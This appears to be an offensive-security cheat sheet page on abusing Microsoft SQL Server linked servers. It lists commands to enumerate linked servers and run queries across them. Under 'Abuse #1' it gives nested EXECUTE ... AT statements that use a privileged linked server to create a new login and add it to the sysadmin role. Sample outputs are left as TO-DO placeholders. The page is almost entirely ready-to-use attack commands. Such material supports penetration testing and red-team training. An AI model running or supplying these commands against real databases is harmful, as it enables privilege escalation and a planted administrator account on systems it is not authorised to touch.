Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Basic Commands
Hint: Use double '' to escape ' in mssql
# Show current server
select @@servername
Sample Output:
TO-DO
# Show linked servers
select srvname from sysservers;
Sample Output:
TO-DO
# Show linked servers
enum_links
Sample Output:
TO-DO
Execute Query between Linked Servers
# Execute query from current server to linked server
EXECUTE ('select @@version;') at [<LINKED_SERVER>];
Sample Output:
TO-DO
# Execute query from linked server to current server
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [<CURRENT_SERVER>]') at [<LINKED_SERVER>];
Sample Output:
TO-DO
Abuse #1: Create Admin User from Privilege Linked Server
EXECUTE('EXECUTE(''CREATE LOGIN <USER> WITH PASSWORD = ''''<PASSWORD>'''';'') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
Sample Output:
TO-DO
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''<USER>'''', ''''sysadmin'''''') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
Sample Output:
TO-DO